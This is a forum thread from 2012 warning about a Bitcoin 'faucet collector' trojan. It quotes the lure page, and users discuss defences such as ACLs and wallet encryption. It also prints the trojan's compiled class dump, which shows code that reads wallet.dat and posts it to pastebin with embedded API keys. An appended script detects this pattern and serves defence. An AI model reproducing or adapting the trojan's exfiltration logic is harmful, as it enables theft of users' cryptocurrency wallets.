Author Topic: trojan warning "BITCOINCOLLECTR"  (Read 1895 times)
hamdi
May 24, 2012, 03:42:31 PM
 #1

WARNING! this tool tries to steal your wallet.dat!!!


this guy ( https://bitcointalk.org/index.php?action=profile;u=57949 ) tries to lure people into using this tool via his signature right now!!

http://[wallet stealer].bt.ohost.de/

Quote
BitcoinCollectr

beta

What is it?

BitcoinCollectr is a little project i'm working on at the moment. It makes use of websites that offer free bitcoins and automatically collects them for you.

Where can I get it?

Download here. Consider that it's still beta and probably buggy. Please report bugs to me.

Contact

yus0r@tormail.org

Donation

I know, it's not worth donating for, but if you insist: 1EZWAuXu3vfHTtBcLuEsht7q1d8Ab7dDPX


Code:
CA\FE\BA\BE\00\00\002v\00\00Main\00\00java/lang/Object\00<init>\00()V\00Code
\00\00 \00\00\00LineNumberTable\00LocalVariableTable\00this\00LMain;\00main\00([Ljava/lang/String;)V\00\00FreeBitcoinService
\00\00 \00\00Bitcoin Faucet \00\00 \00\00\00name\00Ljava/lang/String;\00\00http://freebitcoins.appspot.com \00\00 \00\00\00url?tz\E1G\AE{ \00\00! \00"\00#\00 btcAmount\00D\00%\00Daily Bitcoins\00'\00http://Daily Bitcoins?@bM\D2\F1\A9\FC\00+\00CoinAd\00-\00https://coinad.com/?h\93t\BCj~\FA\001\00Bitcoin Dispenser\003\00http://dispenser.bitbank.me/?PbM\D2\F1\A9\FC\007\00BitCrate\009\00http://http://www.bitcrate.net/?\94z\E1G\AE{\00=\00mycryptcoin.com\00?\00http://mycryptcoin.com/?`bM\D2\F1\A9\FC\00C\00 BitcoinBetas\00E\00http://www.bitcoinbetas.com?\A9\99\99\99\99\99\9A\00I\00java/util/ArrayList
\00H\00 \00L\00N\00M\00java/util/List \00O\00P\00add\00(Ljava/lang/Object;)Z?\ECz\E1G\AE{ \00L\00T \00U\00V\00iterator\00()Ljava/util/Iterator; \00X\00Z\00Y\00java/util/Iterator \00[\00\\00next\00()Ljava/lang/Object;?\F3333333 \00X\00` \00a\00b\00hasNext\00()Z\00d\00>..............................................................
\00\00f \00g\00h\00o\00(Ljava/lang/String;)V\00j\00>: BitcoinCollectr 0.8 beta                          5/13/12  :\00l\00>:                                                            :\00n\00>: Author: Yus0r (yus0r@tormail.org)                          :\00p\00\00\00r\00: Looking for updates..\00t\00http://[wallet stealer].bt.ohost.de
\00v\00x\00w\00Util \00y\00z\00getHTML\00&(Ljava/lang/String;)Ljava/lang/String;
\00\00| \00}\00~\00getWalletFileName\00()Ljava/lang/String;\00\80\00 java/io/File
\00\00\82 \00\00h
\00\00\84 \00\85\00\86\00getBytesFromFile\00(Ljava/io/File;)[B
\00v\00\88 \00\89\00\8A\00asHex\00([B)Ljava/lang/String;
\00\00\8C \00\8D\00h\00sendPost\00\8F\00: no updates available.\00\91\00java/lang/StringBuilder\00\93\00
: Supporting
\00\90\00\82 \00L\00\96 \00\97\00\98\00size\00()I
\00\90\00\9A \00\9B\00\9C\00append\00(I)Ljava/lang/StringBuilder;\00\9E\00! free bitcoin collector websites.
\00\90\00\A0 \00\9B\00\A1\00-(Ljava/lang/String;)Ljava/lang/StringBuilder;
\00\90\00\A3 \00\A4\00~\00toString\00\A6\00: Max. possible profit @\00\00\00\00\00\00\00
\00\90\00\AA \00\9B\00\AB\00(D)Ljava/lang/StringBuilder;\00\AD\00 BTC.\00\AF\00*: Enter receiving address and press ENTER:\00\B1\00java/io/BufferedReader\00\B3\00java/io/InputStreamReader \00\B5\00\B7\00\B6\00java/lang/System \00\B8\00\B9\00in\00Ljava/io/InputStream;
\00\B2\00\BB \00\00\BC\00(Ljava/io/InputStream;)V
\00\B0\00\BE \00\00\BF\00(Ljava/io/Reader;)V
\00\B0\00\C1 \00\C2\00~\00readLine\00\C4\00 : Starting..\00\C6\00: Processing <\00\C8\00>....\00\CA\00java/net/ConnectException
\00\C9\00\82
\00\CD\00\CF\00\CE\00java/lang/Exception \00\D0\00\00printStackTrace
\00\D2\00\CF\00\D3\00java/io/IOException\00args\00[Ljava/lang/String;\00f1\00LFreeBitcoinService;\00f2\00f3\00f4\00f5\00f6\00f7\00services\00Ljava/util/List;\00max\00s\00filename\00bytes\00[B\00hex\00Ljava/io/BufferedReader;\00address\00e\00Ljava/lang/Exception;\00e1\00Ljava/io/IOException;\00LocalVariableTypeTable\00&Ljava/util/List<LFreeBitcoinService;>;\00
StackMapTable\00\D5\00\F1\00java/lang/String\00
Exceptions\00\F4\00java/net/UnknownHostException\00\F6\00 api_dev_key\00\F8\00UTF-8
\00\FA\00\FC\00\FB\00java/net/URLEncoder \00\FD\00\FE\00encode\008(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
\00\F0\00 \00valueOf\00&(Ljava/lang/Object;)Ljava/lang/String;\00=\00 562298eb26ccc3719f7fa178f8b7fef4\00&
\00
api_option \00paste\00 api_user_key\00api_paste_code\00"baedd069b2f6e0948a80c7a8f3daf052: \00 java/net/URL\00$http://pastebin.com/api/api_post.php
\00\82
 \00openConnection\00()Ljava/net/URLConnection;
\00java/net/URLConnection  !\00 setDoOutput\00(Z)V#\00java/io/OutputStreamWriter
% &'\00getOutputStream\00()Ljava/io/OutputStream;
") \00*\00(Ljava/io/OutputStream;)V
", -\00h\00write
"/ 0\00\00flush
2 34\00getInputStream\00()Ljava/io/InputStream;
"6 7\00\00close
\00\B06\00content\00data\00Ljava/net/URL;\00conn\00Ljava/net/URLConnection;\00wr\00Ljava/io/OutputStreamWriter;\00rd\00lineC\00os.name
\00\B5E F\00z\00 getPropertyH\00Linux
\00\F0J KL\00contains\00(Ljava/lang/CharSequence;)ZN\00 user.homeP\00/.bitcoin/wallet.datR\00APPDATA
\00\B5T U\00z\00getenvW\00\Bitcoin\wallet.dat\00osnameZ\00java/io/FileInputStream
Y\ \00]\00(Ljava/io/File;)V
\00_ `a\00length\00()J
Yc de\00read\00([B)I
Y6\00file\00Ljava/io/File;\00fileInputStream\00Ljava/io/FileInputStream; \00\B5l mn\00out\00Ljava/io/PrintStream;
prq\00java/io/PrintStream s\00h\00println\00
SourceFile\00 Main.java

rjk
May 24, 2012, 03:47:25 PM
 #2

Please break your links so that they do not get indexed and flagged.

Mining Rig Extraordinaire - the Trenton BPX6806 18-slot PCIe backplane [PICS] Dead project is dead, all hail the coming of the mighty ASIC!
giszmo
May 24, 2012, 11:40:11 PM
 #3

not too eager to investigate the claims but if it's true, why is this thread so quiet?

vuce
May 25, 2012, 06:10:24 AM
 #4

Even if true I don't see this as such a problem anymore, pretty much everyone should have his wallet encrypted at this time...
drakahn
May 25, 2012, 06:18:10 AM
 #5

there is another one too that people have fallen for "neheminer" or something, claims to be the fastest mining program but steals your wallet (and possibly changes btc addresses sent to clipboard, that may be a different trojan altogether though)

is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction? 

14ga8dJ6NGpiwQkNTXg7KzwozasfaXNfEU
vuce
May 25, 2012, 06:21:13 AM
 #6

Quote
is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction?

acl
drakahn
May 25, 2012, 06:24:02 AM
 #7

Quote
is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction?
acl

i think i need to find a mirror to facepalm myself


14ga8dJ6NGpiwQkNTXg7KzwozasfaXNfEU
dizzy1
May 31, 2012, 01:14:43 AM
 #8

This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decompiled source code.

http://freeter.me:81/BitcoinCollectr0.8beta.src.zip
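
The behaviour described in this post, a class that names wallet.dat and also has the means to send data out over HTTP, can be seen in the class file's constant pool without running or decompiling it. The script below is an added example, not part of the thread or of the decompiled source: it lists the Utf8 constants of a `.class` file and flags that combination. The function names, the `example.invalid` URLs and the sample bytes are constructed for illustration.

```python
import struct

# Payload size in bytes of each fixed-width constant-pool tag (JVM spec 4.4).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def utf8_constants(data):
    """Return every CONSTANT_Utf8 string in a .class file's constant pool."""
    if len(data) < 10 or data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    count = struct.unpack_from(">H", data, 8)[0]
    pos, index, found = 10, 1, []
    while index < count:
        if pos + 3 > len(data):  # every entry is at least tag + 2 bytes
            raise ValueError("truncated constant pool")
        tag, pos = data[pos], pos + 1
        if tag == 1:  # Utf8: u2 length, then the bytes
            size = struct.unpack_from(">H", data, pos)[0]
            found.append(data[pos + 2:pos + 2 + size].decode("utf-8", "replace"))
            pos += 2 + size
        elif tag in FIXED:
            pos += FIXED[tag]
        else:
            raise ValueError("unknown constant tag %d" % tag)
        index += 2 if tag in (5, 6) else 1  # long/double take two slots
    return found

def triage(data):
    """Flag a class that names wallet.dat and also carries network capability."""
    strings = utf8_constants(data)
    wallet = [s for s in strings if "wallet.dat" in s.lower()]
    network = [s for s in strings if s.startswith("java/net/")]
    urls = [s for s in strings if s.startswith(("http://", "https://"))]
    return {"wallet_refs": wallet, "network_classes": network, "urls": urls,
            "suspicious": bool(wallet and (network or urls))}

def build_sample(strings):
    """Constructed input: header, one double, then Utf8 constants (not loadable)."""
    pool = b"\x06" + struct.pack(">d", 0.05)
    for s in strings:
        raw = s.encode("utf-8")
        pool += b"\x01" + struct.pack(">H", len(raw)) + raw
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 50, len(strings) + 3) + pool

# Constructed samples, modelled on strings readable in the dump in the first post.
TROJAN_LIKE = build_sample(["Main", "java/net/URLConnection", "/.bitcoin/wallet.dat",
                            "http://paste.example.invalid/api_post"])
BENIGN = build_sample(["Main", "java/net/URL", "http://faucet.example.invalid/"])
if __name__ == "__main__":
    print(triage(TROJAN_LIKE)["suspicious"], triage(BENIGN)["suspicious"])
```

A hit is a reason to decompile and read the class, not a verdict: wallet software legitimately names wallet.dat, while a faucet collector has no reason to.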
rjk
May 31, 2012, 01:23:27 AM
 #9

Quote
This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decompiled source code.

http://freeter.me:81/BitcoinCollectr0.8beta.src.zip

Maybe if you send the pastebin-related source snippet to pastebin, maybe they can help identify the user based on the included dev and user API keys?

Mining Rig Extraordinaire - the Trenton BPX6806 18-slot PCIe backplane [PICS] Dead project is dead, all hail the coming of the mighty ASIC!
hamdi
June 07, 2012, 12:50:07 AM
 #10

the virus is pretty cool though
